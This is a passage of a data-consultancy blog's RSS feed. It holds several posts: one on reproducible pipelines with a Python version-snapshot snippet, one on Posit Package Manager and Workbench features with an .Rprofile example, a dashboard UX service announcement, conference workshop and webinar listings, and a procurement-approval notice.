team can review your code or take over the project from you.&lt;/p&gt;
&lt;p&gt;One of the best resources that I found while researching this blog post was the book
&lt;a href="https://raps-with-r.dev/" rel="external"&gt;&amp;ldquo;Building reproducible analytical pipelines with R&amp;rdquo;&lt;/a&gt;
by Bruno Rodrigues.
That book covers many of the topics mentioned above: how to set up a project with version control,
how to generate automated reports, how to orchestrate multiple analytical processes together.
It is a very R-focussed book, but the ideas hold whether you work in Python or another language.&lt;/p&gt;
&lt;p&gt;Reproducibility in data science has a long-standing counterpart in
&lt;a href="https://pmc.ncbi.nlm.nih.gov/articles/PMC10591307/" rel="external"&gt;science more generally&lt;/a&gt;.
If you write a scientific paper, the data upon which it is based and the data-processing steps
involved should be made available.
They should also be created in such a way that they can be reused.
If someone wants to regenerate your results, and they can download your data and code, the code
should be written in such a way that this is guaranteed.
Just releasing a script on GitHub isn&amp;rsquo;t enough - the precise version of any used scripts and
project-specific data should be tagged; the programming environment should be matched as closely as
possible (for example, matching the version of R or Python used, using the same versions of any
installed packages); any supporting data sources should be pinned to specific versions and so on.&lt;/p&gt;
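&lt;p&gt;As a small step in that direction, a script can record the versions it was run with. The sketch below uses only the Python standard library; &lt;code&gt;snapshot_environment()&lt;/code&gt; is a hypothetical helper, and recording versions does not by itself recreate the environment.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-qmd" data-lang="qmd"&gt;
```python
import sys
from importlib import metadata


def snapshot_environment(packages):
    """Record the Python version and the installed version of each package."""
    versions = {"python": ".".join(str(part) for part in sys.version_info[:3])}
    for name in packages:
        try:
            versions[name] = metadata.version(name)
        except metadata.PackageNotFoundError:
            versions[name] = None  # not installed in this environment
    return versions


print(snapshot_environment(["pip"]))
```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Saving a snapshot like this alongside the results gives anyone rerunning the analysis a concrete list of versions to match.&lt;/p&gt;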
&lt;p&gt;For us though, RAPs are more about ensuring that data-processing is predictable and transparent,
and that processes can be reused at a subsequent date and with updated data.
Your team may need to level-up their programming skills, or their knowledge of your programming
environment, to take advantage of improved automation.
But doing so will reduce the number of repetitive manual tasks, simplify on-boarding new team
members, and make maintenance easier.&lt;/p&gt;
&lt;p&gt;Also, automating stuff is really fun.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/reproducible-analytical-pipelines/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Three Posit Platform Features Worth Knowing About</title><link>https://www.jumpingrivers.com/blog/posit-platform-updates/</link><pubDate>Fri, 13 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/posit-platform-updates/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/posit-platform-updates/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/posit-platform-updates/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We recently ran a session on &lt;a href="https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/" rel="external"&gt;Posit platform updates&lt;/a&gt;, the kind of features that don&amp;rsquo;t always make it onto your radar but can make a real difference once you know they&amp;rsquo;re there.&lt;/p&gt;
&lt;p&gt;This post covers the three highlights: speeding up R package installation with Posit Package Manager, a new way to explore example apps on Connect, and Workbench Jobs for long-running tasks.&lt;/p&gt;
&lt;h2 id="r-package-installs-dont-have-to-take-26-minutes"&gt;R package installs don&amp;rsquo;t have to take 26 minutes&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;ve ever kicked off a Tidyverse install and gone to make a coffee (and come back to find it still running), this one&amp;rsquo;s for you. When you install from source, which is what happens if you point R at a plain CRAN mirror on Linux, R downloads the source tarball and compiles everything from scratch. That takes time. A lot of it. In our test, a clean Tidyverse install on R 4.4 took 26 minutes.&lt;/p&gt;
&lt;p&gt;The fix is to point R at a binary-supporting mirror, which is exactly what &lt;a href="https://www.jumpingrivers.com/posit/managed-services/" rel="external"&gt;Posit Package Manager&lt;/a&gt; provides. With binaries, that same install dropped to under two minutes: no compilation, no hunting down system dependencies.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re on R 4.5, it gets better. R 4.5 introduced parallel package downloads, which cuts that two-minute install down to around 40 seconds. Throw in parallel CPU usage for installation as well via the &lt;code&gt;Ncpus&lt;/code&gt; argument, and you&amp;rsquo;re looking at 15 seconds for a full Tidyverse install in a clean environment.&lt;/p&gt;
&lt;p&gt;There&amp;rsquo;s also a preview feature to keep an eye on: ManyLinux support in &lt;a href="https://posit.co/products/enterprise/package-manager/" rel="external"&gt;Package Manager&lt;/a&gt;. The idea is to bundle more of the system-level dependencies into the package itself, which means less dependency management for sysadmins. Downloads are a bit larger, but the maintenance overhead is lower. If you want a deeper dive into PPM itself, we have a &lt;a href="https://www.jumpingrivers.com/training/course/package-management-with-ppm/" rel="external"&gt;Managing Packages with Posit Package Manager training course&lt;/a&gt; that covers this in detail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The short version:&lt;/strong&gt; use binaries + R 4.5 + parallel installs. You can go from half an hour to about 15 seconds.&lt;/p&gt;
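&lt;p&gt;As a rough sketch of that setup, the snippet below could go in a project&amp;rsquo;s &lt;code&gt;.Rprofile&lt;/code&gt;. The repository URL assumes Posit Public Package Manager and Ubuntu 22.04 (&lt;code&gt;jammy&lt;/code&gt;), and the &lt;code&gt;Ncpus&lt;/code&gt; value of 4 is an arbitrary choice. Neither comes from our test setup, so swap in your own server, distribution and core count. The user agent line follows the pattern Posit documents for plain R sessions on Linux, as we understand it, so that the server can match binaries to your R version.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r"&gt;# Sketch of an .Rprofile: the URL, distro and core count are assumptions
options(
  # Binary repository for Ubuntu 22.04 ("jammy") on Posit Public Package Manager
  repos = c(CRAN = "https://packagemanager.posit.co/cran/__linux__/jammy/latest"),
  # Report the R version and platform so the server can pick matching binaries
  HTTPUserAgent = sprintf(
    "R/%s R (%s)",
    getRversion(),
    paste(getRversion(), R.version$platform, R.version$arch, R.version$os)
  ),
  # Install up to four packages in parallel (picked up by install.packages())
  Ncpus = 4L
)

# Then, in a fresh session: install.packages("tidyverse")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On R 4.5 or later the parallel downloads should need no extra configuration, so these options are the only part you have to set yourself.&lt;/p&gt;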
&lt;h2 id="connect-gallery-example-apps-without-the-setup-friction"&gt;Connect Gallery: example apps without the setup friction&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;ve used &lt;a href="https://posit.co/products/enterprise/connect/" rel="external"&gt;Posit Connect&lt;/a&gt; for a while, you might remember the quick-start popup that appeared on first login — a set of example apps you could try out. That&amp;rsquo;s been replaced by Connect Gallery, which lives in the interface rather than popping up in front of you.&lt;/p&gt;
&lt;p&gt;What&amp;rsquo;s changed isn&amp;rsquo;t just where it lives. Installing an example app is now one click. Previously you&amp;rsquo;d follow a set of instructions to get it running; now it just deploys.&lt;/p&gt;
&lt;p&gt;Two examples worth highlighting from the gallery:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Usage Metrics&lt;/strong&gt; — shows you which content on your Connect server is actually being used, filtered by time period and user. It uses a visitor key, so the app shows each viewer only the content they have permission to see. Useful for admins wondering what&amp;rsquo;s getting traction and what isn&amp;rsquo;t.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Command Center for Publishers&lt;/strong&gt; — a dashboard built with Python that reimplements much of the Connect admin interface inside an app. You can rename deployed content, lock it, and manage it through the Connect API. Worth looking at both as a tool and as an example of how to build admin functionality on top of Connect.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re new to Connect or want to get more from it, our &lt;a href="https://www.jumpingrivers.com/training/course/r-posit-workbench-team-cloud/" rel="external"&gt;Introduction to Posit Workbench training course&lt;/a&gt; covers the full Posit environment including how Workbench and Connect work together.&lt;/p&gt;
&lt;h2 id="workbench-jobs-run-something-long-and-close-your-session"&gt;Workbench Jobs: run something long and close your session&lt;/h2&gt;
&lt;p&gt;This one comes up as a question fairly often: if I start a background job in &lt;a href="https://www.jumpingrivers.com/posit/managed-services/" rel="external"&gt;Posit Workbench&lt;/a&gt; and close my session, will it keep running?&lt;/p&gt;
&lt;p&gt;The old answer was no. Background jobs were child processes of your session: close the session and the job goes with it.&lt;/p&gt;
&lt;p&gt;Workbench Jobs are different. They run independently of your session. You can start a job, close RStudio Pro or VS Code entirely, and the job keeps going. When you open a new session, you can still see it running, check its live output, and monitor resource usage.&lt;/p&gt;
&lt;p&gt;This is handy for anything that takes longer than you want to babysit: data processing pipelines, model training runs, file exports. The job has access to your data sources and connections, and you can pick up wherever you left off.&lt;/p&gt;
&lt;p&gt;There&amp;rsquo;s also an auditing option for Workbench Jobs. When enabled, the output gets a cryptographic signature, useful if you need to demonstrate not just that the job ran, but exactly what it produced.&lt;/p&gt;
&lt;h2 id="workbench-jobs-vs-scheduled-content-on-connect"&gt;Workbench Jobs vs scheduled content on Connect&lt;/h2&gt;
&lt;p&gt;A quick note on when to use which. If you need to run something once from inside your current workflow and you want access to local files, data connections, and everything in your working environment, a Workbench Job makes sense. It&amp;rsquo;s more hands-on.&lt;/p&gt;
&lt;p&gt;If you need to schedule something to run repeatedly, share the results with other people, or get an email when it&amp;rsquo;s done, that&amp;rsquo;s what Connect is for. The two tools complement each other rather than compete.&lt;/p&gt;
&lt;p&gt;If any of this is relevant to your setup, whether you&amp;rsquo;re looking at speeding up your package environment, making better use of Connect, or running longer jobs in Workbench, &lt;a href="https://www.jumpingrivers.com/posit/managed-services/" rel="external"&gt;get in touch&lt;/a&gt;. As a &lt;a href="https://www.jumpingrivers.com/posit/license-resale/" rel="external"&gt;certified Posit Partner&lt;/a&gt;, we help teams get the most from their Posit investment, from infrastructure setup to long-term managed support.&lt;/p&gt;
&lt;hr&gt;
&lt;blockquote&gt;
&lt;h3 id="ai-in-production--45-june-2026-newcastle"&gt;AI in Production — 4–5 June 2026, Newcastle&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;re thinking about how AI fits into production data science environments, this is the conference for it. Two days of real-world talks and hands-on workshops from practitioners across engineering and ML, covering deployment, monitoring, scaling, and what actually works when AI leaves the prototype stage.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;Register now at ai-in-production.jumpingrivers.com&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/posit-platform-updates/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Is Your Dashboard User Friendly?</title><link>https://www.jumpingrivers.com/blog/dashboard-ux/</link><pubDate>Thu, 12 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/dashboard-ux/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/dashboard-ux/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/dashboard-ux/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
figure {
background-color: var(--cream);
padding: 1rem;
font-size: 0.8rem;
display: flex;
flex-direction: column;
row-gap: 1rem;
margin-bottom: 1rem;
width: 625px;
max-width: 100%;
border-radius: 0.5rem;
margin-left: auto;
margin-right: auto;
}
figure img {
width: 100%;
}
figcaption {
border-top: 1px solid var(--off-white);
padding-top: 0.25rem;
}
&lt;/style&gt;
&lt;p&gt;For a while, we at Jumping Rivers have offered a Dashboard Health Check (DHC), largely focused on backend features and other facets the end user doesn&amp;rsquo;t see: things like version control, documentation and deployment. However, the DHC also included a few checks related to user experience and accessibility. While we&amp;rsquo;ve always believed these are useful additions, we would like to offer our clients more in-depth guidance on how they can make their applications more user-friendly. To facilitate this, we are now introducing the Frontend Dashboard Health Check (FDHC).&lt;/p&gt;
&lt;h2 id="what-could-an-fdhc-help-me-with"&gt;What could an FDHC help me with?&lt;/h2&gt;
&lt;p&gt;So what kind of advice can you expect from a Frontend Dashboard Health Check? Here are just a few of the possibilities:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Tools like Shiny and Dash make it relatively quick and easy to build data dashboards. These can often start out as a fixed single page of data and, over time, morph into something much more complex and interactive with multiple views. Such applications can be incredibly powerful, but with great power comes great &lt;del&gt;responsibility&lt;/del&gt; complexity. For a dashboard to be successful, users need to understand how to use it effectively to answer their questions. This can mean discovering and/or learning many features from basic navigation between views to how to interrogate the data contained within using techniques like search, filter, sort, partition, drill-down and summarise. We can suggest places where users may get stuck or confused, and suggest means of amelioration.&lt;/li&gt;
&lt;li&gt;A successful, production-ready dashboard also needs to be robust. At minimum, that means being resilient to unexpected user input and to its own (perhaps temporary) inability to provide the output it&amp;rsquo;s supposed to (if a server is down, for example). An app that just hangs when something goes wrong is going to confuse and frustrate users and can lead to wasted time and even loss of work. We can show you where your app may fall over so that you can take action to prevent it.&lt;/li&gt;
&lt;li&gt;These days we consume pages from the world wide web using all manner of devices. Does your app work on 4k and 5k monitors? More importantly, at the other end of the scale, there is now usually the expectation that things should work on mobile and other touchscreen devices. We can show you at which dimensions your app layout may become difficult or impossible to use and where users using specific input methods - e.g. mouse, touch, keyboard - may have difficulties.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="what-deliverables-would-i-get-from-an-fdhc"&gt;What deliverables would I get from an FDHC?&lt;/h2&gt;
&lt;p&gt;The principal deliverable from an FDHC is a detailed spreadsheet indicating what issues we&amp;rsquo;ve found and where they can be found (or how to reproduce them). Wherever practical we will also include annotated screenshots (or occasionally recordings) giving a visual outline of a problem (see below). We will also strive to suggest possible remedies.&lt;/p&gt;
&lt;figure&gt;
&lt;picture id="page-spill" aria-labelledby="page-spill-label"&gt;
&lt;source srcset="assets/page-spill.webp 1x, assets/page-spill@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/page-spill.{{ $fallback }}" alt="{{ $alt }}"&gt;
&lt;/picture&gt;
&lt;figcaption id="page-spill-label"&gt;An example of annotated screenshots highlighting an issue with the page layout for certain width-ranges for an old version of our own Litmus Dashboard application.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure&gt;
&lt;picture id="permanent-labels" aria-labelledby="permanent-labels-label"&gt;
&lt;source srcset="assets/permanent-labels.webp 1x, assets/permanent-labels@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/permanent-labels.{{ $fallback }}" alt="{{ $alt }}"&gt;
&lt;/picture&gt;
&lt;figcaption id="permanent-labels-label"&gt;An example of an annotated screenshot highlighting an issue with input labelling for an old version of our own Litmus Dashboard application.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;h2 id="what-about-the-old-dhc"&gt;What about the old DHC?&lt;/h2&gt;
&lt;p&gt;We will continue to offer a separate, report-based health check for data dashboards. This &amp;ldquo;Backend Dashboard Health Check&amp;rdquo; (BDHC) will cover things like version control, documentation and deployment, as before. We are, of course, more than happy to run a BDHC and an FDHC on the same application.&lt;/p&gt;
&lt;h2 id="how-do-i-find-out-more"&gt;How do I find out more?&lt;/h2&gt;
&lt;p&gt;Please get in touch via &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;this contact form&lt;/a&gt; or drop us an email at &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/dashboard-ux/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>AI in Production 2026 Workshops: What’s Coming in June</title><link>https://www.jumpingrivers.com/blog/ai-in-production-2026-workshops/</link><pubDate>Wed, 11 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/ai-in-production-2026-workshops/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/ai-in-production-2026-workshops/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/ai-in-production-2026-workshops/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We are excited to share more details about the workshops taking place at &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;AI in Production 2026&lt;/strong&gt;&lt;/a&gt;, which will be held in &lt;strong&gt;Newcastle upon Tyne on 4–5 June 2026&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;AI in Production is a two-day conference. &lt;strong&gt;Day 1 (Thursday 4 June)&lt;/strong&gt; is dedicated to hands-on workshops, followed by a full day of conference talks on &lt;strong&gt;Friday 5 June&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The workshop sessions are designed to give attendees practical exposure to the tools, patterns, and decisions involved in running AI systems in production. From large language models and data platforms to modern development tools, the focus is on how AI systems are actually built, deployed, and maintained.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for our AI in Production conference! For more details, check out our
&lt;a href="https://ai-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="how-day-1-works"&gt;How Day 1 Works&lt;/h2&gt;
&lt;p&gt;Thursday 4 June is divided into &lt;strong&gt;morning and afternoon workshop sessions&lt;/strong&gt;, allowing attendees to take part in &lt;strong&gt;two half-day workshops&lt;/strong&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attend &lt;strong&gt;two workshops&lt;/strong&gt; across the day&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lunch is included&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;All workshop tickets include access to the &lt;strong&gt;Thursday evening dinner reception&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Workshops are delivered by &lt;strong&gt;Jumping Rivers consultants and invited speakers&lt;/strong&gt;, including practitioners working with platforms such as &lt;a href="https://www.databricks.com/" rel="external"&gt;Databricks&lt;/a&gt; and modern AI tooling in production environments.&lt;/p&gt;
&lt;h2 id="morning-workshops"&gt;Morning Workshops&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;09:30 – 12:45&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="prompt-craft-and-ai-integration-building-llm-driven-workflows-in-r-and-python"&gt;Prompt Craft and AI Integration: Building LLM Driven Workflows in R and Python&lt;/h3&gt;
&lt;p&gt;This workshop focuses on integrating large language models into &lt;strong&gt;R and Python workflows&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Participants will explore prompt design, calling LLMs from production code, and handling common challenges such as inconsistent outputs and failure cases. The emphasis is on understanding where LLMs add value and how they fit into reliable systems.&lt;/p&gt;
&lt;h3 id="from-nothing-to-gold-productionising-with-databricks-using-the-medallion-architecture"&gt;From Nothing to Gold: Productionising with Databricks Using the Medallion Architecture&lt;/h3&gt;
&lt;p&gt;This workshop walks through the &lt;strong&gt;Medallion Architecture&lt;/strong&gt; as it is used in production environments.&lt;/p&gt;
&lt;p&gt;Participants will explore how data moves from raw ingestion to analytics and machine learning ready layers, with a focus on structure, quality, and scalability. The session draws on hands-on experience using Databricks to support data engineering and AI workloads.&lt;/p&gt;
&lt;h3 id="improving-your-workflow-with-positron-and-claude"&gt;Improving Your Workflow with Positron and Claude&lt;/h3&gt;
&lt;p&gt;This session explores how modern development tools support day-to-day data science and engineering work.&lt;/p&gt;
&lt;p&gt;The workshop focuses on using &lt;strong&gt;Positron alongside AI assistance&lt;/strong&gt; to write, explore, and refine code more efficiently while maintaining clarity and control. It is particularly relevant for teams working in &lt;strong&gt;R and Python&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="afternoon-workshops"&gt;Afternoon Workshops&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;13:45 – 17:00&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="shiny-meets-llms-smarter-app-experiences"&gt;Shiny Meets LLMs: Smarter App Experiences&lt;/h3&gt;
&lt;p&gt;This workshop explores how large language models can be integrated into &lt;strong&gt;Shiny applications&lt;/strong&gt; to create more interactive user experiences.&lt;/p&gt;
&lt;p&gt;Topics include designing effective user interactions, managing latency and cost, and thinking through reliability when deploying AI-enabled apps to users.&lt;/p&gt;
&lt;h3 id="the-power-of-databricks-genie-rooms-data-discovery-and-questions-with-minimal-effort"&gt;The Power of Databricks Genie Rooms: Data Discovery and Questions with Minimal Effort&lt;/h3&gt;
&lt;p&gt;This workshop focuses on &lt;strong&gt;Databricks Genie Rooms&lt;/strong&gt; and their role in natural language driven data discovery.&lt;/p&gt;
&lt;p&gt;Participants will explore how this approach works in practice, when it is effective, and where its limitations lie, particularly in production settings that support analysts and business users.&lt;/p&gt;
&lt;h3 id="self-hosted-llms-running-your-own-inference-infrastructure"&gt;Self Hosted LLMs: Running Your Own Inference Infrastructure&lt;/h3&gt;
&lt;p&gt;This workshop focuses on running &lt;strong&gt;large language models on your own infrastructure&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The session covers infrastructure choices, performance and cost trade-offs, and operational considerations, factoring in constraints such as privacy, regulation, and reliability.&lt;/p&gt;
&lt;h2 id="drinks-reception"&gt;Drinks Reception&lt;/h2&gt;
&lt;p&gt;Day 1 concludes with a &lt;strong&gt;dinner and drinks reception from 17:00 to 19:30&lt;/strong&gt;, hosted in the &lt;strong&gt;atrium of The Catalyst building&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;This reception is included with all workshop tickets and offers an opportunity to meet speakers, connect with other attendees, and continue conversations before the conference talks on Friday.&lt;/p&gt;
&lt;h2 id="who-the-workshops-are-for"&gt;Who the Workshops Are For&lt;/h2&gt;
&lt;p&gt;The Day 1 workshops are designed for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data scientists and machine learning practitioners&lt;/li&gt;
&lt;li&gt;Engineers working on AI and data platforms&lt;/li&gt;
&lt;li&gt;Analysts moving closer to production work&lt;/li&gt;
&lt;li&gt;Technical leads responsible for AI systems&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each workshop stands on its own, allowing you to choose sessions that best match your interests.&lt;/p&gt;
&lt;h2 id="join-us-in-newcastle"&gt;Join Us in Newcastle&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;AI in Production 2026&lt;/strong&gt;&lt;/a&gt; takes place on &lt;strong&gt;4–5 June 2026&lt;/strong&gt; at &lt;strong&gt;The Catalyst in Newcastle upon Tyne&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Workshop places are limited to keep sessions interactive. If you are interested in AI in production, Databricks, LLMs, R, Python, or modern data platforms, you can learn more and register on the &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;AI in Production conference website&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/ai-in-production-2026-workshops/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Data Processing in Pandas and Polars: Free Jumping Rivers Webinar</title><link>https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/</link><pubDate>Thu, 05 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Python offers a wide range of tools for data manipulation, but choosing the right one often depends on performance needs, workflow preferences, and dataset size.&lt;/p&gt;
&lt;p&gt;On &lt;strong&gt;19 March&lt;/strong&gt;, Jumping Rivers is hosting a webinar focused on a practical question: &lt;strong&gt;how does data processing compare between pandas and polars?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The session will be led by &lt;a href="https://www.jumpingrivers.com/authors/russ-hyde/" rel="external"&gt;Russ Hyde&lt;/a&gt;, Senior Data Scientist at Jumping Rivers, who regularly works with Python-based data workflows across analysis, training, and production environments.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;&lt;strong&gt;You can register for the webinar using this form.&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="what-youll-learn"&gt;What You’ll Learn&lt;/h2&gt;
&lt;p&gt;This session will implement the same data processing pipeline in both pandas and polars to highlight how each library approaches common tasks.
Russ will walk through:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Key syntax differences between pandas and polars&lt;/li&gt;
&lt;li&gt;How each library handles core data manipulation steps&lt;/li&gt;
&lt;li&gt;Performance and usability considerations&lt;/li&gt;
&lt;li&gt;New functionality introduced in pandas 3.0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The goal is to give Python users a clearer understanding of when each tool makes sense and how recent updates affect day-to-day workflows.&lt;/p&gt;
&lt;h2 id="why-this-matters"&gt;Why This Matters&lt;/h2&gt;
&lt;p&gt;Pandas remains the standard library for in-memory tabular data analysis, and familiarity with its syntax is essential for many data science roles.
At the same time, polars is gaining attention due to its performance-focused design and efficient execution model.&lt;/p&gt;
&lt;p&gt;Understanding the strengths and trade-offs of both libraries helps teams:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Improve data processing performance&lt;/li&gt;
&lt;li&gt;Choose tools aligned with project requirements&lt;/li&gt;
&lt;li&gt;Write clearer and more maintainable code&lt;/li&gt;
&lt;li&gt;Stay current with developments in the Python ecosystem&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As expectations around performance and scalability increase, informed tooling decisions become more important.&lt;/p&gt;
&lt;h2 id="continued-learning-benefits"&gt;Continued Learning Benefits&lt;/h2&gt;
&lt;p&gt;Jumping Rivers encourages teams to stay engaged with the wider webinar series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attend &lt;strong&gt;two webinars&lt;/strong&gt; and receive &lt;strong&gt;20% off tickets&lt;/strong&gt; to the &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;AI in Production 2026 conference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Attend &lt;strong&gt;more than two webinars&lt;/strong&gt; and receive &lt;strong&gt;20% off&lt;/strong&gt; any Jumping Rivers public training course&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="event-details"&gt;Event Details&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Date:&lt;/strong&gt; 19 March 2026&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Time:&lt;/strong&gt; 1:15 PM (UK time)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Venue:&lt;/strong&gt; Online&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;&lt;strong&gt;Register for the webinar using this form to secure your spot.&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Jumping Rivers Now Approved to Sell Services Through DOS7: Crown Commercial Services</title><link>https://www.jumpingrivers.com/blog/approved-dos7-crown-commercial-services/</link><pubDate>Tue, 17 Feb 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/approved-dos7-crown-commercial-services/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/approved-dos7-crown-commercial-services/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/approved-dos7-crown-commercial-services/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jumping Rivers has been approved to sell our services through the &lt;a href="https://www.crowncommercial.gov.uk/" rel="external"&gt;Crown Commercial Service&lt;/a&gt; (CCS).&lt;/p&gt;
&lt;p&gt;For UK public sector organisations, this is an important milestone. It means there is now a simpler, compliant way to work with us without going through lengthy procurement processes from scratch.&lt;/p&gt;
&lt;h2 id="what-the-crown-commercial-service-does"&gt;What the Crown Commercial Service does&lt;/h2&gt;
&lt;p&gt;The Crown Commercial Service supports public sector organisations by creating and managing procurement frameworks. These frameworks are designed to help teams buy services in a way that is compliant, transparent, and efficient.&lt;/p&gt;
&lt;p&gt;Instead of running a full tender every time a service is needed, public sector buyers can use CCS frameworks to access pre-approved suppliers who have already met specific standards around capability, pricing, and compliance.&lt;/p&gt;
&lt;h2 id="what-our-approval-means"&gt;What our approval means&lt;/h2&gt;
&lt;p&gt;Being approved on a CCS framework means our services have been reviewed and assessed against the requirements expected for public sector procurement.&lt;/p&gt;
&lt;p&gt;This includes areas such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Technical capability and experience&lt;/li&gt;
&lt;li&gt;Value for money&lt;/li&gt;
&lt;li&gt;Compliance with public sector procurement standards&lt;/li&gt;
&lt;li&gt;Clear and transparent service offerings&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For public sector teams, this reduces risk and removes a lot of the administrative burden that often comes with procurement.&lt;/p&gt;
